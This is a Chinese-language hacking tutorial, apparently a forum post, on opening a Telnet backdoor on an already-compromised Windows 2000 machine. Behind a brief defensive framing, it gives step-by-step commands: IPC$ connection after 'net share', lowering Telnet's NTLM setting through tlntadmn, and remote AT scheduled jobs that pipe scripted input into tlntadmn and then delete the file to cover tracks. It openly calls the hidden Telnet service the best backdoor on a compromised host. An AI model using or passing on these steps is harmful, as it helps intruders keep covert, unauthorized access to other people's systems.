对于Telnet的使用中,它的入侵问题一直都令我们担忧。那么如何进行保护和防范呢?这里我们需要了解攻击的原理。下面我们就介绍一下Telnet服务被入侵的过程吧。这样也可以让我们对防止这类事情有所帮助。在入侵中,得到管理员帐号之后,很多事情显得轻而易举,可有时候幸运之神并不是总落在你身上的,这不,刚刚溢出成功内网的机器,本想用IPC$连接上去,竟发现"网络路径不存在",看来有必要先运行一次:net share /y 启动共享服务,显示成功后,终于连接搞定了!不过在接下来的开Telnet服务中便遇到了NTLM认证的问题,搬出自己习惯使用的工具:不依赖于IPC共享的VBS脚本,连忙传上去.运行之后却显示不成功,纳闷了.只能驱猫上线,继续我那无期的学习之路了,半晌终于找到一篇关开打开Telnet的教学,在再三测试后终于成功打开了那部机器的Telnet,经验不敢独享,写出来与大家共赏.
我们知道WIN2000中自带Tlntadmn命令,它可以更改Telnet的端口、运行参数、最大登录人数等等,可惜讨厌的NTLM认证会让我们远程无法登陆,现在我们需要的是摆脱NTLM认证的问题:
方法1:手动修改Tlntadmn:
我们按下面的命令直接在本地CMD下操作:
- C:\WINNT\system32>tlntadmn.exe
- Microsoft (R) Windows 2000 (TM) (内部版本号 2195)
- Telnet Server Admin (Build 5.00.99201.1)
请在下列选项中选择一个:
0) 退出这个应用程序
1) 列出当前用户
2) 结束一个用户的会话 ...
3) 显示 / 更改注册表设置 ...
4) 开始服务
5) 停止服务
请键入一个选项的号码 [0 - 5] 以选择该选项:
选3回车进入设置,进入如下子界面:
请在下列选项中选择一个:
0) 退出这个菜单
1) AllowTrustedDomain
2) AltKeyMapping
3) DefaultDomain
4) DefaultShell
5) LoginScript
6) MaxFailedLogins
7) NTLM
8) TelnetPort
请键入一个选项的号码 [0 - 8] 以选择该选项:
我们选7,回车进入设置:NTLM的当前值=2,我们给它设置成1就可以了.设置完成后重启Telnet服务:net stop Telnet、net start Telnet,再在本地连接23端口,输入管理员帐号密码就OK了!手动修改NTLM的方法就这么简单,在平时入侵的时候,如果有3389等远程连接方式,推荐大家使用这样的方法去修改.#p#
方法2:利用脚本修改Tlntadmn:
有时我们出于特殊原因不要求立即停止Telnet服务或是变更NTLM模式,这时我们必须借助AT命令:at \\IP time 程序名,但实际上操作的话我们会发现:类似tlntadmn这样的程序是控制台的一个交互式工具,其参数设置并不能很好的被AT命令所调用,我们应如何处理呢?换句话说在没有3389等远程登陆的模式下,如何给方便的给对方开启Telnet服务呢?我们可以将命令写入一个txt文件,再加以调用.写入的命令请按照下面的顺序:
停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认(y)->退出菜单(0)->启动服务(4)->退出程序(0)
在方法1中我们知道在每个选择后面都要回车确认运行,所以我们要模拟操作写入的数据应是:
5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车)4(回车)0(回车)
现在我们有二种思路接下去做:一是直接在被入侵机器的CMD上制作txt文件以供调用;二是在本地生成txt再上传到被入侵机器以供调用.
下面我们看他们分别是如何实现的:
1.直接在被入侵机器的CMD上制作txt文件以供调用.依次在cmd下如此运行命令:
- at \\ip time "echo 5 > c:\Telnet.txt"
- at \\ip time "echo 3 >> c:\Telnet.txt"
- at \\ip time "echo 7 >> c:\Telnet.txt"
- at \\ip time "echo y >> c:\Telnet.txt"
- at \\ip time "echo 0 >> c:\Telnet.txt"
- at \\ip time "echo y >> c:\Telnet.txt"
- at \\ip time "echo 0 >> c:\Telnet.txt"
- at \\ip time "echo 4 >> c:\Telnet.txt"
- at \\ip time "echo 0 >> c:\Telnet.txt"
- at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt"
- at \\ip time "del c:\Telnet.txt /f"
只须按上面的命令行一行行打入运行就可以了.效果与方法1是等同的.
2.在本地生成txt再上传到被入侵机器以供调用.在本地机器上做一个Telnet.txt文件,内容如下:
5 3 7 y 0 y 0 4 0
注意每一行都要加回车,然后将这个文件上传到被入侵机器的C:盘下:
copy Telnet.txt \\ip\c$
再设置在某时间内启动并删除巳上传文件: at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt" at \\ip time "del c:\Telnet.txt /f"
很简单的dos管道重定向原理,这样就完成tlntadmn的交互过程.效果与方法A是等同的,简单那吧?
Tlntadmn在处理Telnet上显得异常强大,在入侵过程中如果能熟练应用它,那么开放Telnet服务将显得轻而易举,当然,隐蔽的Telnet服务也就是肉鸡上最好的后门了!你学会了吗?